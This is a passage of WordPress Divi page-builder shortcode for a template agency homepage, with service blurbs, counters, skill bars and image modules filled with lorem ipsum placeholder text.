button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" animation_duration=\"1200ms\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" 